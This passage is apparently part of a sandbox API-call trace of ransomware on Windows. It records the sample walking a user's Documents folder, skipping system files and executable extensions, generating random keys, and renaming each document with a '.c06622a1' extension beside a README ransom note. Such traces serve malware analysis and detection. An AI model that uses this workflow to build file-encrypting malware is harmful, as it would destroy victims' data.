halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\d- dbc5fvbfpf0acefh.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1cc [0158.329] CreateIoCompletionPort (FileHandle=0x1cc, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0158.329] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0158.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a2f6ed9 [0158.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1a847425 [0158.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3b9ab264 [0158.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4bc39948 [0158.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x373bfc6 [0158.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5cd66db [0158.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfa30313 [0158.337] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4e2fc0be [0158.340] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0x33ad6379 [0158.340] RtlComputeCrc32 (PartialCrc=0x6379, Buffer=0x3480094, Length=0x80) returned 0x645dd26f [0158.340] RtlComputeCrc32 (PartialCrc=0xd26f, Buffer=0x3480094, Length=0x80) returned 0x182d5fd [0158.340] RtlComputeCrc32 (PartialCrc=0xd5fd, Buffer=0x3480094, Length=0x80) returned 0xddbf118e [0158.340] RtlComputeCrc32 (PartialCrc=0x118e, Buffer=0x3480094, Length=0x80) returned 0xffb271e5 [0158.340] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0158.340] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.340] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.340] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x268be210, ftCreationTime.dwHighDateTime=0x1d5e74c, ftLastAccessTime.dwLowDateTime=0x15c4fa0, ftLastAccessTime.dwHighDateTime=0x1d5e3cf, ftLastWriteTime.dwLowDateTime=0x15c4fa0, ftLastWriteTime.dwHighDateTime=0x1d5e3cf, nFileSizeHigh=0x0, nFileSizeLow=0x12f77, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fjb5gfB8.pps", cAlternateFileName="")) returned 1 [0158.340] _wcsicmp (_Str1="Fjb5gfB8.pps", _Str2="README.c06622a1.TXT") returned -12 [0158.340] wcsstr (_Str="Fjb5gfB8.pps", _SubStr="README") returned 0x0 [0158.340] _wcsicmp (_Str1="autorun.inf", _Str2="Fjb5gfB8.pps") returned -5 [0158.340] wcslen (_String="autorun.inf") returned 0xb [0158.340] _wcsicmp (_Str1="boot.ini", _Str2="Fjb5gfB8.pps") returned -4 [0158.340] wcslen (_String="boot.ini") returned 0x8 [0158.340] _wcsicmp (_Str1="bootfont.bin", _Str2="Fjb5gfB8.pps") returned -4 [0158.340] wcslen (_String="bootfont.bin") returned 0xc [0158.341] _wcsicmp (_Str1="bootsect.bak", _Str2="Fjb5gfB8.pps") returned -4 [0158.341] wcslen (_String="bootsect.bak") returned 0xc [0158.341] _wcsicmp (_Str1="desktop.ini", _Str2="Fjb5gfB8.pps") returned -2 [0158.341] wcslen (_String="desktop.ini") returned 0xb [0158.341] _wcsicmp (_Str1="iconcache.db", _Str2="Fjb5gfB8.pps") returned 3 [0158.341] wcslen (_String="iconcache.db") returned 0xc [0158.341] _wcsicmp (_Str1="ntldr", _Str2="Fjb5gfB8.pps") returned 8 [0158.341] wcslen (_String="ntldr") returned 0x5 [0158.341] _wcsicmp (_Str1="ntuser.dat", _Str2="Fjb5gfB8.pps") returned 8 [0158.341] wcslen (_String="ntuser.dat") returned 0xa [0158.341] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Fjb5gfB8.pps") returned 8 [0158.341] wcslen (_String="ntuser.dat.log") returned 0xe [0158.341] _wcsicmp (_Str1="ntuser.ini", _Str2="Fjb5gfB8.pps") returned 8 [0158.341] wcslen (_String="ntuser.ini") returned 0xa [0158.341] _wcsicmp (_Str1="thumbs.db", _Str2="Fjb5gfB8.pps") returned 14 [0158.341] wcslen (_String="thumbs.db") returned 0x9 [0158.341] _wcsicmp (_Str1="386", _Str2="pps") returned -61 [0158.341] wcslen (_String="386") returned 0x3 [0158.341] _wcsicmp (_Str1="adv", _Str2="pps") returned -15 [0158.341] wcslen (_String="adv") returned 0x3 [0158.341] _wcsicmp (_Str1="ani", _Str2="pps") returned -15 [0158.341] wcslen (_String="ani") returned 0x3 [0158.341] _wcsicmp (_Str1="bat", _Str2="pps") returned -14 [0158.341] wcslen (_String="bat") returned 0x3 [0158.341] _wcsicmp (_Str1="bin", _Str2="pps") returned -14 [0158.341] wcslen (_String="bin") returned 0x3 [0158.341] _wcsicmp (_Str1="cab", _Str2="pps") returned -13 [0158.341] wcslen (_String="cab") returned 0x3 [0158.342] _wcsicmp (_Str1="cmd", _Str2="pps") returned -13 [0158.342] wcslen (_String="cmd") returned 0x3 [0158.342] _wcsicmp (_Str1="com", _Str2="pps") returned -13 [0158.342] wcslen (_String="com") returned 0x3 [0158.342] _wcsicmp (_Str1="cpl", _Str2="pps") returned -13 [0158.342] wcslen (_String="cpl") returned 0x3 [0158.342] _wcsicmp (_Str1="cur", _Str2="pps") returned -13 [0158.342] wcslen (_String="cur") returned 0x3 [0158.342] _wcsicmp (_Str1="deskthemepack", _Str2="pps") returned -12 [0158.342] wcslen (_String="deskthemepack") returned 0xd [0158.342] _wcsicmp (_Str1="diagcab", _Str2="pps") returned -12 [0158.342] wcslen (_String="diagcab") returned 0x7 [0158.342] _wcsicmp (_Str1="diagcfg", _Str2="pps") returned -12 [0158.342] wcslen (_String="diagcfg") returned 0x7 [0158.342] _wcsicmp (_Str1="diagpkg", _Str2="pps") returned -12 [0158.342] wcslen (_String="diagpkg") returned 0x7 [0158.342] _wcsicmp (_Str1="dll", _Str2="pps") returned -12 [0158.342] wcslen (_String="dll") returned 0x3 [0158.342] _wcsicmp (_Str1="drv", _Str2="pps") returned -12 [0158.342] wcslen (_String="drv") returned 0x3 [0158.342] _wcsicmp (_Str1="exe", _Str2="pps") returned -11 [0158.342] wcslen (_String="exe") returned 0x3 [0158.342] _wcsicmp (_Str1="hlp", _Str2="pps") returned -8 [0158.342] wcslen (_String="hlp") returned 0x3 [0158.342] _wcsicmp (_Str1="icl", _Str2="pps") returned -7 [0158.342] wcslen (_String="icl") returned 0x3 [0158.342] _wcsicmp (_Str1="icns", _Str2="pps") returned -7 [0158.342] wcslen (_String="icns") returned 0x4 [0158.342] _wcsicmp (_Str1="ico", _Str2="pps") returned -7 [0158.342] wcslen (_String="ico") returned 0x3 [0158.342] _wcsicmp (_Str1="ics", _Str2="pps") returned -7 [0158.343] wcslen (_String="ics") returned 0x3 [0158.343] _wcsicmp (_Str1="idx", _Str2="pps") returned -7 [0158.343] wcslen (_String="idx") returned 0x3 [0158.343] _wcsicmp (_Str1="ldf", _Str2="pps") returned -4 [0158.343] wcslen (_String="ldf") returned 0x3 [0158.343] _wcsicmp (_Str1="lnk", _Str2="pps") returned -4 [0158.343] wcslen (_String="lnk") returned 0x3 [0158.343] _wcsicmp (_Str1="mod", _Str2="pps") returned -3 [0158.343] wcslen (_String="mod") returned 0x3 [0158.343] _wcsicmp (_Str1="mpa", _Str2="pps") returned -3 [0158.343] wcslen (_String="mpa") returned 0x3 [0158.343] _wcsicmp (_Str1="msc", _Str2="pps") returned -3 [0158.343] wcslen (_String="msc") returned 0x3 [0158.343] _wcsicmp (_Str1="msp", _Str2="pps") returned -3 [0158.343] wcslen (_String="msp") returned 0x3 [0158.343] _wcsicmp (_Str1="msstyles", _Str2="pps") returned -3 [0158.343] wcslen (_String="msstyles") returned 0x8 [0158.343] _wcsicmp (_Str1="msu", _Str2="pps") returned -3 [0158.343] wcslen (_String="msu") returned 0x3 [0158.343] _wcsicmp (_Str1="nls", _Str2="pps") returned -2 [0158.343] wcslen (_String="nls") returned 0x3 [0158.343] _wcsicmp (_Str1="nomedia", _Str2="pps") returned -2 [0158.343] wcslen (_String="nomedia") returned 0x7 [0158.343] _wcsicmp (_Str1="ocx", _Str2="pps") returned -1 [0158.343] wcslen (_String="ocx") returned 0x3 [0158.343] _wcsicmp (_Str1="prf", _Str2="pps") returned 2 [0158.343] wcslen (_String="prf") returned 0x3 [0158.343] _wcsicmp (_Str1="ps1", _Str2="pps") returned 3 [0158.343] wcslen (_String="ps1") returned 0x3 [0158.343] _wcsicmp (_Str1="rom", _Str2="pps") returned 2 [0158.343] wcslen (_String="rom") returned 0x3 [0158.343] _wcsicmp (_Str1="rtp", _Str2="pps") returned 2 [0158.343] wcslen (_String="rtp") returned 0x3 [0158.343] _wcsicmp (_Str1="scr", _Str2="pps") returned 3 [0158.344] wcslen (_String="scr") returned 0x3 [0158.344] _wcsicmp (_Str1="shs", _Str2="pps") returned 3 [0158.344] wcslen (_String="shs") returned 0x3 [0158.344] _wcsicmp (_Str1="spl", _Str2="pps") returned 3 [0158.344] wcslen (_String="spl") returned 0x3 [0158.344] _wcsicmp (_Str1="sys", _Str2="pps") returned 3 [0158.344] wcslen (_String="sys") returned 0x3 [0158.344] _wcsicmp (_Str1="theme", _Str2="pps") returned 4 [0158.344] wcslen (_String="theme") returned 0x5 [0158.344] _wcsicmp (_Str1="themepack", _Str2="pps") returned 4 [0158.344] wcslen (_String="themepack") returned 0x9 [0158.344] _wcsicmp (_Str1="wpx", _Str2="pps") returned 7 [0158.344] wcslen (_String="wpx") returned 0x3 [0158.344] _wcsicmp (_Str1="lock", _Str2="pps") returned -4 [0158.344] wcslen (_String="lock") returned 0x4 [0158.344] _wcsicmp (_Str1="key", _Str2="pps") returned -5 [0158.344] wcslen (_String="key") returned 0x3 [0158.344] _wcsicmp (_Str1="hta", _Str2="pps") returned -8 [0158.344] wcslen (_String="hta") returned 0x3 [0158.344] _wcsicmp (_Str1="msi", _Str2="pps") returned -3 [0158.344] wcslen (_String="msi") returned 0x3 [0158.344] _wcsicmp (_Str1="pdb", _Str2="pps") returned -12 [0158.344] wcslen (_String="pdb") returned 0x3 [0158.344] _wcsicmp (_Str1="sqlite", _Str2="pps") returned 3 [0158.344] wcslen (_String="sqlite") returned 0x6 [0158.344] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe")) returned 0x10 [0158.344] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.345] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" [0158.345] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned 0x4f [0158.345] wcscpy (in: _Dest=0x32a0130, _Source="Fjb5gfB8.pps" | out: _Dest="Fjb5gfB8.pps") returned="Fjb5gfB8.pps" [0158.345] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\Fjb5gfB8.pps", dwFileAttributes=0x80) returned 1 [0158.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\Fjb5gfB8.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\fjb5gfb8.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0158.345] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.345] ReadFile (in: hFile=0x19c, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0158.346] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x6e43d6cd [0158.346] RtlComputeCrc32 (PartialCrc=0xd6cd, Buffer=0x32e4a4, Length=0x80) returned 0xeacbb1f0 [0158.346] RtlComputeCrc32 (PartialCrc=0xb1f0, Buffer=0x32e4a4, Length=0x80) returned 0xb10ed6da [0158.346] RtlComputeCrc32 (PartialCrc=0xd6da, Buffer=0x32e4a4, Length=0x80) returned 0xbbb1e673 [0158.346] RtlComputeCrc32 (PartialCrc=0xe673, Buffer=0x32e4a4, Length=0x80) returned 0x6b60d97 [0158.346] CloseHandle (hObject=0x19c) returned 1 [0158.346] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b0098 [0158.346] wcscpy (in: _Dest=0x32b0098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\Fjb5gfB8.pps" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\Fjb5gfB8.pps") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\Fjb5gfB8.pps" [0158.346] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\Fjb5gfB8.pps") returned 0x5c [0158.346] wcscpy (in: _Dest=0x32b0150, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0158.346] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\Fjb5gfB8.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\fjb5gfb8.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\Fjb5gfB8.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\fjb5gfb8.pps.c06622a1"), dwFlags=0x8) returned 1 [0158.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\Fjb5gfB8.pps.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe\\fjb5gfb8.pps.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0158.349] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0158.349] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0158.356] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x139e3c1a [0158.356] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xd21e034 [0158.356] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3bc0a4d [0158.356] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x75954112 [0158.356] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4b7d13c [0158.356] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x15e3ba38 [0158.356] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x64084f5b [0158.356] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3e191f92 [0158.359] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x40a770d0 [0158.359] RtlComputeCrc32 (PartialCrc=0x70d0, Buffer=0x3510094, Length=0x80) returned 0xeba05e1d [0158.359] RtlComputeCrc32 (PartialCrc=0x5e1d, Buffer=0x3510094, Length=0x80) returned 0xc117f198 [0158.359] RtlComputeCrc32 (PartialCrc=0xf198, Buffer=0x3510094, Length=0x80) returned 0x1bf77e55 [0158.359] RtlComputeCrc32 (PartialCrc=0x7e55, Buffer=0x3510094, Length=0x80) returned 0xad78a5ea [0158.360] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0158.360] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32a0090) returned 1 [0158.360] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b0098) returned 1 [0158.360] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14ff8280, ftCreationTime.dwHighDateTime=0x1d5dcad, ftLastAccessTime.dwLowDateTime=0x53c00300, ftLastAccessTime.dwHighDateTime=0x1d5daeb, ftLastWriteTime.dwLowDateTime=0x53c00300, ftLastWriteTime.dwHighDateTime=0x1d5daeb, nFileSizeHigh=0x0, nFileSizeLow=0xec12, dwReserved0=0x0, dwReserved1=0x0, cFileName="OkahbG2X jgZg.pptx", cAlternateFileName="OKAHBG~1.PPT")) returned 1 [0158.360] _wcsicmp (_Str1="OkahbG2X jgZg.pptx", _Str2="README.c06622a1.TXT") returned -3 [0158.360] wcsstr (_Str="OkahbG2X jgZg.pptx", _SubStr="README") returned 0x0 [0158.360] _wcsicmp (_Str1="autorun.inf", _Str2="OkahbG2X jgZg.pptx") returned -14 [0158.360] wcslen (_String="autorun.inf") returned 0xb [0158.360] _wcsicmp (_Str1="boot.ini", _Str2="OkahbG2X jgZg.pptx") returned -13 [0158.360] wcslen (_String="boot.ini") returned 0x8 [0158.360] _wcsicmp (_Str1="bootfont.bin", _Str2="OkahbG2X jgZg.pptx") returned -13 [0158.360] wcslen (_String="bootfont.bin") returned 0xc [0158.360] _wcsicmp (_Str1="bootsect.bak", _Str2="OkahbG2X jgZg.pptx") returned -13 [0158.360] wcslen (_String="bootsect.bak") returned 0xc [0158.360] _wcsicmp (_Str1="desktop.ini", _Str2="OkahbG2X jgZg.pptx") returned -11 [0158.360] wcslen (_String="desktop.ini") returned 0xb [0158.360] _wcsicmp (_Str1="iconcache.db", _Str2="OkahbG2X jgZg.pptx") returned -6 [0158.360] wcslen (_String="iconcache.db") returned 0xc [0158.360] _wcsicmp (_Str1="ntldr", _Str2="OkahbG2X jgZg.pptx") returned -1 [0158.360] wcslen (_String="ntldr") returned 0x5 [0158.360] _wcsicmp (_Str1="ntuser.dat", _Str2="OkahbG2X jgZg.pptx") returned -1 [0158.360] wcslen (_String="ntuser.dat") returned 0xa [0158.360] _wcsicmp (_Str1="ntuser.dat.log", _Str2="OkahbG2X jgZg.pptx") returned -1 [0158.361] wcslen (_String="ntuser.dat.log") returned 0xe [0158.361] _wcsicmp (_Str1="ntuser.ini", _Str2="OkahbG2X jgZg.pptx") returned -1 [0158.361] wcslen (_String="ntuser.ini") returned 0xa [0158.361] _wcsicmp (_Str1="thumbs.db", _Str2="OkahbG2X jgZg.pptx") returned 5 [0158.361] wcslen (_String="thumbs.db") returned 0x9 [0158.361] _wcsicmp (_Str1="386", _Str2="pptx") returned -61 [0158.361] wcslen (_String="386") returned 0x3 [0158.361] _wcsicmp (_Str1="adv", _Str2="pptx") returned -15 [0158.361] wcslen (_String="adv") returned 0x3 [0158.361] _wcsicmp (_Str1="ani", _Str2="pptx") returned -15 [0158.361] wcslen (_String="ani") returned 0x3 [0158.361] _wcsicmp (_Str1="bat", _Str2="pptx") returned -14 [0158.361] wcslen (_String="bat") returned 0x3 [0158.361] _wcsicmp (_Str1="bin", _Str2="pptx") returned -14 [0158.361] wcslen (_String="bin") returned 0x3 [0158.361] _wcsicmp (_Str1="cab", _Str2="pptx") returned -13 [0158.361] wcslen (_String="cab") returned 0x3 [0158.361] _wcsicmp (_Str1="cmd", _Str2="pptx") returned -13 [0158.361] wcslen (_String="cmd") returned 0x3 [0158.361] _wcsicmp (_Str1="com", _Str2="pptx") returned -13 [0158.361] wcslen (_String="com") returned 0x3 [0158.361] _wcsicmp (_Str1="cpl", _Str2="pptx") returned -13 [0158.361] wcslen (_String="cpl") returned 0x3 [0158.361] _wcsicmp (_Str1="cur", _Str2="pptx") returned -13 [0158.361] wcslen (_String="cur") returned 0x3 [0158.361] _wcsicmp (_Str1="deskthemepack", _Str2="pptx") returned -12 [0158.362] wcslen (_String="deskthemepack") returned 0xd [0158.362] _wcsicmp (_Str1="diagcab", _Str2="pptx") returned -12 [0158.362] wcslen (_String="diagcab") returned 0x7 [0158.362] _wcsicmp (_Str1="diagcfg", _Str2="pptx") returned -12 [0158.362] wcslen (_String="diagcfg") returned 0x7 [0158.362] _wcsicmp (_Str1="diagpkg", _Str2="pptx") returned -12 [0158.362] wcslen (_String="diagpkg") returned 0x7 [0158.362] _wcsicmp (_Str1="dll", _Str2="pptx") returned -12 [0158.362] wcslen (_String="dll") returned 0x3 [0158.362] _wcsicmp (_Str1="drv", _Str2="pptx") returned -12 [0158.362] wcslen (_String="drv") returned 0x3 [0158.362] _wcsicmp (_Str1="exe", _Str2="pptx") returned -11 [0158.362] wcslen (_String="exe") returned 0x3 [0158.362] _wcsicmp (_Str1="hlp", _Str2="pptx") returned -8 [0158.362] wcslen (_String="hlp") returned 0x3 [0158.362] _wcsicmp (_Str1="icl", _Str2="pptx") returned -7 [0158.362] wcslen (_String="icl") returned 0x3 [0158.362] _wcsicmp (_Str1="icns", _Str2="pptx") returned -7 [0158.362] wcslen (_String="icns") returned 0x4 [0158.362] _wcsicmp (_Str1="ico", _Str2="pptx") returned -7 [0158.362] wcslen (_String="ico") returned 0x3 [0158.362] _wcsicmp (_Str1="ics", _Str2="pptx") returned -7 [0158.362] wcslen (_String="ics") returned 0x3 [0158.362] _wcsicmp (_Str1="idx", _Str2="pptx") returned -7 [0158.363] wcslen (_String="idx") returned 0x3 [0158.363] _wcsicmp (_Str1="ldf", _Str2="pptx") returned -4 [0158.363] wcslen (_String="ldf") returned 0x3 [0158.363] _wcsicmp (_Str1="lnk", _Str2="pptx") returned -4 [0158.363] wcslen (_String="lnk") returned 0x3 [0158.363] _wcsicmp (_Str1="mod", _Str2="pptx") returned -3 [0158.363] wcslen (_String="mod") returned 0x3 [0158.363] _wcsicmp (_Str1="mpa", _Str2="pptx") returned -3 [0158.363] wcslen (_String="mpa") returned 0x3 [0158.363] _wcsicmp (_Str1="msc", _Str2="pptx") returned -3 [0158.363] wcslen (_String="msc") returned 0x3 [0158.363] _wcsicmp (_Str1="msp", _Str2="pptx") returned -3 [0158.363] wcslen (_String="msp") returned 0x3 [0158.363] _wcsicmp (_Str1="msstyles", _Str2="pptx") returned -3 [0158.363] wcslen (_String="msstyles") returned 0x8 [0158.363] _wcsicmp (_Str1="msu", _Str2="pptx") returned -3 [0158.363] wcslen (_String="msu") returned 0x3 [0158.363] _wcsicmp (_Str1="nls", _Str2="pptx") returned -2 [0158.363] wcslen (_String="nls") returned 0x3 [0158.363] _wcsicmp (_Str1="nomedia", _Str2="pptx") returned -2 [0158.363] wcslen (_String="nomedia") returned 0x7 [0158.363] _wcsicmp (_Str1="ocx", _Str2="pptx") returned -1 [0158.363] wcslen (_String="ocx") returned 0x3 [0158.363] _wcsicmp (_Str1="prf", _Str2="pptx") returned 2 [0158.363] wcslen (_String="prf") returned 0x3 [0158.363] _wcsicmp (_Str1="ps1", _Str2="pptx") returned 3 [0158.363] wcslen (_String="ps1") returned 0x3 [0158.363] _wcsicmp (_Str1="rom", _Str2="pptx") returned 2 [0158.363] wcslen (_String="rom") returned 0x3 [0158.363] _wcsicmp (_Str1="rtp", _Str2="pptx") returned 2 [0158.364] wcslen (_String="rtp") returned 0x3 [0158.364] _wcsicmp (_Str1="scr", _Str2="pptx") returned 3 [0158.364] wcslen (_String="scr") returned 0x3 [0158.364] _wcsicmp (_Str1="shs", _Str2="pptx") returned 3 [0158.364] wcslen (_String="shs") returned 0x3 [0158.364] _wcsicmp (_Str1="spl", _Str2="pptx") returned 3 [0158.364] wcslen (_String="spl") returned 0x3 [0158.364] _wcsicmp (_Str1="sys", _Str2="pptx") returned 3 [0158.364] wcslen (_String="sys") returned 0x3 [0158.364] _wcsicmp (_Str1="theme", _Str2="pptx") returned 4 [0158.364] wcslen (_String="theme") returned 0x5 [0158.364] _wcsicmp (_Str1="themepack", _Str2="pptx") returned 4 [0158.364] wcslen (_String="themepack") returned 0x9 [0158.364] _wcsicmp (_Str1="wpx", _Str2="pptx") returned 7 [0158.364] wcslen (_String="wpx") returned 0x3 [0158.364] _wcsicmp (_Str1="lock", _Str2="pptx") returned -4 [0158.364] wcslen (_String="lock") returned 0x4 [0158.364] _wcsicmp (_Str1="key", _Str2="pptx") returned -5 [0158.364] wcslen (_String="key") returned 0x3 [0158.364] _wcsicmp (_Str1="hta", _Str2="pptx") returned -8 [0158.364] wcslen (_String="hta") returned 0x3 [0158.364] _wcsicmp (_Str1="msi", _Str2="pptx") returned -3 [0158.364] wcslen (_String="msi") returned 0x3 [0158.364] _wcsicmp (_Str1="pdb", _Str2="pptx") returned -12 [0158.364] wcslen (_String="pdb") returned 0x3 [0158.364] _wcsicmp (_Str1="sqlite", _Str2="pptx") returned 3 [0158.364] wcslen (_String="sqlite") returned 0x6 [0158.364] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_6f2uodqzk-uc\\qnlgqkm9qwac\\-qfyowbe")) returned 0x10 [0158.365] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32a0090 [0158.365] wcscpy (in: _Dest=0x32a0090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe" [0158.365] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe") returned 0x4f [0158.365] wcscpy (in: _Dest=0x32a0130, _Source="OkahbG2X jgZg.pptx" | out: _Dest="OkahbG2X jgZg.pptx") returned="OkahbG2X jgZg.pptx" [0158.365] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\OkahbG2X jgZg.pptx", dwFileAttributes=0x80) returned 1 [0158.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_6F2UOdqzk-Uc\\QNlgQkm9Qwac\\-QFYowbe\\OkahbG2X jgZg.pptx" (normalized: "c:\\users\\5p5nrgjn0js 